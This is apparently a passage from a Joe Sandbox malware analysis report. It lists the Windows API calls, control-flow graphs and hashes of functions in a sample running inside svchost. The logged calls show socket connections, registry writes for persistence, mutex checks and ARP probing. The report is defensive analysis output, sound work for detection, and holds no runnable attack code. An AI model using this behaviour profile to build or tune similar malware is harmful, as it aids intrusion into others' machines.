                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 3184855960-3203441087
                                                                                                                                                                                • Opcode ID: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                • Instruction ID: 3abf82c69722f3967bdfbc74bbd690c7064bfefbac1ba47bfefbd6294108a016
                                                                                                                                                                                • Opcode Fuzzy Hash: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                • Instruction Fuzzy Hash: B341F072944359BBEB129BA8CC81AEEB77CFF15B08F180439E649B7180E77469448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13145427: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 1314335A
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13143365
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131433C2
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 131433CA
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 131433D8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131433ED
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegSetValueExA.KERNELBASE(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegCloseKey.KERNELBASE(131433FC), ref: 1314ADAA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                • String ID: LoadLibraryExA$abznfys96047$iloopeb74987$pvoaiwz6588
                                                                                                                                                                                • API String ID: 1822930774-1497254345
                                                                                                                                                                                • Opcode ID: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                • Instruction ID: 8a80587115f15fefb65b334c3320f1afafce057311b930bd89483dacacd9f4c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                • Instruction Fuzzy Hash: A71198B6600355AFE710BBBD8DC5B5E765CEB05658F390835EA08D2544FF38A8118A71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • gethostname.WS2_32(?,00000040), ref: 13146239
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 13146242
                                                                                                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314626B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314627D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146288
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                • API String ID: 4149995341-444255208
                                                                                                                                                                                • Opcode ID: 1986a9e41c43eb34f473fceb462b583d8eb4d4567ed788cf03a4328257d43c49
                                                                                                                                                                                • Instruction ID: 47acca0eb84ca6fe1e33d45648bc88bed4be747462007ed9b973c7a6eb3a8290
                                                                                                                                                                                • Opcode Fuzzy Hash: 1986a9e41c43eb34f473fceb462b583d8eb4d4567ed788cf03a4328257d43c49
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A115E76E10319FBDB01ABB4CD8AFDE7BACAF08658F144534F901E6144E778D64486A1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 249 13143212-13143240 GetCurrentThreadId CreateThread 250 13143242-13143244 249->250 251 13143249-1314325b CreateThread 249->251 252 131432d0-131432d4 250->252 251->250 253 1314325d-1314326b Sleep 251->253 254 13143273-1314327a 253->254 255 13143291-131432a4 CreateThread 254->255 256 1314327c-1314328f Sleep 254->256 255->250 257 131432a6-131432b8 CreateThread 255->257 256->254 256->255 257->250 258 131432ba-131432ce CreateThread 257->258 258->252
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143216
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,1314AC90,00000000,00000000,1315B698), ref: 1314323C
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,1314E335,00000000,00000000,1315B684), ref: 13143257
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4,?,?,1314340F), ref: 13143269
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 13143281
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,131460AA,00000000,00000000,1315B688), ref: 1314329F
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,131448A8,00000000,00000000,1315B68C), ref: 131432B4
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,1314CCE7,00000000,00000000,1315B694), ref: 131432C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 773548574-0
                                                                                                                                                                                • Opcode ID: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                • Instruction ID: 8fd118986bc5cf1931c0d32a12ebccf3781935e800841fb4d7bc385c2169f3f6
                                                                                                                                                                                • Opcode Fuzzy Hash: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C11E1F074539A7FFA106B728CC4DB73AACFB92B8AB204935F421E2086D7649C005970
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1314ACA4
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314ACB7
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314ACD3
                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACFA
                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD36
                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 1314AD3F
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 1314AD4A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3351196999-0
                                                                                                                                                                                • Opcode ID: 6922f7d9124d7a3246c10e81ec5a986fabe7229a4ae0cac61f5c8b55bced464a
                                                                                                                                                                                • Instruction ID: 684fc2d828c6b53409bf90891137dc24cc90040d836e8d8021af879d67d54080
                                                                                                                                                                                • Opcode Fuzzy Hash: 6922f7d9124d7a3246c10e81ec5a986fabe7229a4ae0cac61f5c8b55bced464a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B113D75A40219FFEB14ABA4CD45FEE7B7CAB04708F200030E605B6185E7B5AA44DB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 275 13144bd5-13144beb HeapCreate 276 13144c23-13144c2e 275->276 277 13144bed-13144c03 HeapCreate 275->277 278 13144c05-13144c15 HeapCreate 277->278 279 13144c22 277->279 278->279 280 13144c17-13144c1d GetProcessHeap 278->280 279->276 280->279
                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314338F,00000000,00016B00,LoadLibraryExA,?), ref: 13144BE2
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016B00), ref: 13144BFA
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144C0C
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 13144C17
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Create$Process
                                                                                                                                                                                • String ID: LoadLibraryExA
                                                                                                                                                                                • API String ID: 846323464-2601528877
                                                                                                                                                                                • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction ID: df309c537f147d9e7df735f2a449fb756469b5c2332ceeb35925c3edc0e0c3b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0A7B1A012A56BCB04AF364EC0C4BAFDCE349358364AC3EF105D2504FB38884587B0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                • PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                • API String ID: 3711117582-2466685467
                                                                                                                                                                                • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction ID: 40d1b3cb4e87c1594f7b209ae58ce819227e3fa9e4917f1197cc4b9cdaa05ffb
                                                                                                                                                                                • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE09A76B4023067EA0077A58C4EFDA7A2CCB00A99B440030F902F92C0EB94E54286A9
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 288 1314cce7-1314cd12 call 13144ff4 291 1314cd14 288->291 292 1314cd15-1314cd2a Sleep call 13144d1b 291->292 294 1314cd2f-1314cd83 call 13144d1b call 13144eb1 * 2 call 131518db call 13144ec3 * 2 292->294 294->292 307 1314cd85-1314cd8a 294->307 308 1314cda6-1314cde2 select call 13144eb1 * 2 307->308 309 1314cd8c-1314cd9c call 1314bda1 307->309 318 1314ced8-1314ceed call 13144d1b 308->318 319 1314cde8-1314cdee 308->319 314 1314cda0-1314cda4 309->314 315 1314cd9e 309->315 314->308 314->309 315->314 326 1314cef3-1314cf00 318->326 327 1314cfcc-1314cfe3 call 13144ec3 * 2 318->327 319->318 321 1314cdf4-1314cdfa 319->321 321->318 322 1314ce00-1314ce0d 321->322 324 1314ce13-1314ce24 __WSAFDIsSet 322->324 325 1314cec9-1314ced2 322->325 324->325 328 1314ce2a-1314ce36 call 1314beaa 324->328 325->318 325->322 329 1314cf06-1314cf09 326->329 330 1314cfbd-1314cfc6 326->330 327->291 328->325 339 1314ce3c-1314ce3f 328->339 329->330 333 1314cf0f-1314cf14 329->333 330->326 330->327 336 1314cf16-1314cf24 call 1315186f 333->336 337 1314cf29-1314cf32 333->337 336->330 342 1314cf34-1314cf40 call 1314bc08 337->342 343 1314cf6b-1314cf87 call 13151bf3 call 1314c147 337->343 344 1314ce95-1314ce9b 339->344 345 1314ce41-1314ce45 339->345 358 1314cf42-1314cf4c call 131513df 342->358 359 1314cf4e-1314cf69 call 1314bd15 GetTickCount 342->359 371 1314cfb3 343->371 372 1314cf89-1314cf9b call 1314c0cc 343->372 344->325 349 1314ce9d-1314cea6 call 1314b1c8 344->349 350 1314ce47-1314ce4e 345->350 351 1314ce50-1314ce53 345->351 349->325 370 1314cea8-1314ceab 349->370 350->325 356 1314ce75-1314ce78 351->356 357 1314ce55-1314ce5e call 1314c081 351->357 361 1314ce89 356->361 362 1314ce7a-1314ce87 356->362 378 1314ce64-1314ce72 call 13144c2f 357->378 379 1314ce60-1314ce62 357->379 358->336 359->330 368 1314ce8b-1314ce93 call 1314b0e3 361->368 362->368 368->379 370->325 376 1314cead-1314ceb6 call 1314c081 370->376 374 1314cfb5-1314cfb8 call 13151be5 371->374 372->374 386 1314cf9d-1314cfae call 131513df call 1315186f 372->386 374->330 376->379 388 1314ceb8-1314cec6 call 13144c2f 376->388 378->356 379->325 386->371 388->325
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(00000001), ref: 1314CD17
                                                                                                                                                                                  • Part of subcall function 13144D1B: _memset.LIBCMT ref: 13144D39
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 131518DB: EnterCriticalSection.KERNEL32(05801028,13161EF0,00000000,05801020,05801020,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                  • Part of subcall function 131518DB: LeaveCriticalSection.KERNEL32(05801028,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                  • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004), ref: 13144ECE
                                                                                                                                                                                • select.WS2_32(00000000,13161EF0,00000000,131616E8,?), ref: 1314CDC0
                                                                                                                                                                                • __WSAFDIsSet.WS2_32(?,13161EF0), ref: 1314CE1D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$CountSleepTick_memsetselect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 462285117-0
                                                                                                                                                                                • Opcode ID: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                • Instruction ID: 8757cdd0e8f0453b9c503d8fe05b6102780d6c7efeff28d5d7c0a94bffacdc5e
                                                                                                                                                                                • Opcode Fuzzy Hash: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 49818B75900316FFCF10DFA8D99099EBBF9EF05314B35093AE511B3294DB38AA518BA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13144937
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,13144394,?,00000000,00000000), ref: 13144AB2
                                                                                                                                                                                • Sleep.KERNELBASE(0000000A,?), ref: 13144B06
                                                                                                                                                                                • Sleep.KERNELBASE(00000032,?,?,?), ref: 13144B25
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409902211-0
                                                                                                                                                                                • Opcode ID: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                • Instruction ID: 6d998106411ceb65381bfd4e6dc3443c2a6c4742902684d26abc5299e1fbab67
                                                                                                                                                                                • Opcode Fuzzy Hash: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                • Instruction Fuzzy Hash: B9710276A80360EFC715EF99C9C5E5A7BF8FB86758F34002AE505E7244EB78A440CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(00020000,76B5EEA0,00000000), ref: 1314303C
                                                                                                                                                                                • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143096
                                                                                                                                                                                • StrStrIA.KERNELBASE(00000000,00000000,0000007B), ref: 131430B7
                                                                                                                                                                                • inet_addr.WS2_32(00000000), ref: 131430E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4064751120-0
                                                                                                                                                                                • Opcode ID: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction ID: 935e66ac97efac0b4d3c00a972a79d93a54dab84a4458b0e7672ed538a15f6a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c29bf9a9e3164cd00cdf173d5a8084e70e7ccd357447c54fdac7d7a3ea16c70
                                                                                                                                                                                • Instruction Fuzzy Hash: B251A779740355BBE724ABA9CC8DF9A3B29EB82B18F14043DF145962C0EBB4A444CA65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,76B5EEA0,13143401), ref: 131432EF
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000), ref: 13143303
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 32694325-0
                                                                                                                                                                                • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction ID: 36019c5d3645fadee2bcba3f0f1670733127cd8a2b67beb26c680348bd35dee3
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF054B1A443316BFF08EBFD6D667962E9C9B49364F244437F505D2184EFA48001DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004), ref: 13144ECE
                                                                                                                                                                                • Sleep.KERNELBASE(00000001), ref: 131460FF
                                                                                                                                                                                • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314614E
                                                                                                                                                                                  • Part of subcall function 1315182B: EnterCriticalSection.KERNEL32(05801028,00000000,00000000,76B26490,131461DD,00000000,00000000,000000FF), ref: 13151834
                                                                                                                                                                                  • Part of subcall function 1315182B: LeaveCriticalSection.KERNEL32(05801028), ref: 13151845
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131461F6
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314620F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 890587828-0
                                                                                                                                                                                • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction ID: aa9922c8d6f98b1bcbd01e6166526c1982ba4151100d3d07f382ebb813d1f31a
                                                                                                                                                                                • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B313974A00320EFCF15ABA8CD91A6C7666AF82A3CF380A35E451761D5DF74A941C790
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 616 131462bc-131462cd call 13146213 619 131462e7 616->619 620 131462cf-131462e5 616->620 621 131462ee-13146324 htons socket 619->621 620->621 622 13146326-1314632f GetLastError 621->622 623 13146330-13146334 621->623
                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000FA0), ref: 131462FC
                                                                                                                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 13146317
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13143375,00016B00,LoadLibraryExA,?), ref: 13146326
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLasthtonssocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3100113635-0
                                                                                                                                                                                • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction ID: 65d3a68209b55ec02d1a8e1dcb1c20dd2b6278565e4f18be07d174e7e848d9e5
                                                                                                                                                                                • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 06F04CF56103A4AFDB08ABE4CD96BA976A89F0631CF140539E462D53C5E3FC8100D732
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • RegSetValueExA.KERNELBASE(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                • RegCloseKey.KERNELBASE(131433FC), ref: 1314ADAA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2964171075-0
                                                                                                                                                                                • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction ID: 463864c30009ddb7c9bf7bc6fec684855c3ce20d6730d88446eca340b249a078
